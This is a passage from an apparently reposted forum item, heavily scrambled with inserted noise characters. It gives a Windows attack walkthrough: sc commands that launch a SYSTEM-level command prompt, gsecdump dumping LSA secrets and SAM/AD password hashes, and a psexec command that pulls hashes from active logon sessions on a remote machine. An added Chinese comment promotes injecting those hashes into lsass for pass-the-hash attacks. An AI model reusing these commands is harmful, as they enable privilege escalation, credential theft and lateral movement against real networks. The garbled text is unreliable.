o get a DOS Prompt as NT system:
7 s3 p1 m" w* w9 }# U8 o3 }3 b' m! r" n0 D$ s6 D. p5 ?9 L
C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact& T0 t7 \4 F& [' k: [2 |6 i
[SC] CreateService SUCCESS
) x# ?5 ^, E5 M5 j( S( b. c9 R) C! A3 q+ X4 X; b
C:\>sc start shellcmdline
! n+ x" }( L. v# e( l/ g3 \[SC] StartService FAILED 1053: }9 I6 t5 w- K
# C" g* D/ _, t# }5 }* I5 k+ B
The service did not respond to the start or control request in a timely fashion.
* ]# L6 {' _& x* }! K9 k; y) b& U4 a
C:\>sc delete shellcmdline
0 k# p5 n9 B/ P w& \[SC] DeleteService SUCCESS1 q S; @% H9 Q( N1 w+ F) x
2 Y( J! ~: o: g7 u J6 m- M------------6 z6 B& Z4 T. @5 z5 q* B9 _
+ A1 |+ @$ X+ f0 q3 C0 ?Then in the new DOS window:" K+ ~: ^3 ]! }8 A5 Q. I9 q8 q! q
3 s# l# {5 S/ s1 b+ x1 G
Microsoft Windows XP [Version 5.1.2600]
! l1 M D E5 c5 o& I4 a(C) Copyright 1985-2001 Microsoft Corp.9 y6 D+ H/ j3 p5 `
2 n- F+ I# I% n
C:\WINDOWS\system32>whoami$ O: g) T3 q' ?
NT AUTHORITY\SYSTEM
' C# n' E/ r6 m: _$ M% o* x* ?. _6 B q& P# e4 I* a; J$ Y9 H- e! {
C:\WINDOWS\system32>gsecdump -h h' R- A6 z( J& B* ~
gsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se), d% Z* i! ^0 G8 N( }0 _% [
usage: gsecdump [options]
. l. ~' T/ G4 y3 x5 \6 p% O. i* d$ c3 B
options:" C! ^" T$ s. T0 d/ y8 U( o
-h [ --help ] show help" k, ?. I9 ~: M8 f9 n
-a [ --dump_all ] dump all secrets
1 S; ~$ x% M, j-l [ --dump_lsa ] dump lsa secrets% z$ ^ E" a+ |6 B- p
-w [ --dump_wireless ] dump microsoft wireless connections. i9 z4 i. M' H* Q7 {' V
-u [ --dump_usedhashes ] dump hashes from active logon sessions
: {/ Y% F# e. }7 h' ]: N8 l-s [ --dump_hashes ] dump hashes from SAM/AD& X1 w# ^$ d" T9 N: k
. u2 _) S) `1 k! H
Although I like to use:0 E- v+ H8 E" n& g" p1 f8 Y
8 i3 A d3 K3 N4 vPsExec v1.83 - Execute processes remotely
2 w9 q- B+ X6 b! s% J. Z; i( ~Copyright (C) 2001-2007 Mark Russinovich
2 R5 r2 v: G3 O6 KSysinternals - 链接标记[url]www.sysinternals.com[/url]! [( ?/ s/ q% h+ n. L+ T) t
$ z5 V1 h' M; v7 G. m: W7 B2 aC:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT( m" z+ e5 q; @3 ~. A% O
, Z) i! w/ h8 r4 u
to get the hashes from active logon sessions of a remote system.
/ t( y: M2 }( ~, B8 ~" z8 C
* b8 Q6 ^6 q [0 m7 D1 ZThese are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.
6 e9 ]4 g# V- S, @
. M4 n: m" r, A& V( [提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.
9 U/ _6 |, ]0 W; o4 B" u( @原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]
( \) E8 q0 G( j: Z6 `: g$ @
7 L( i7 s4 l3 ?0 c& t& y/ O我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。# x0 D/ ^0 C' ?( W" D K* y
|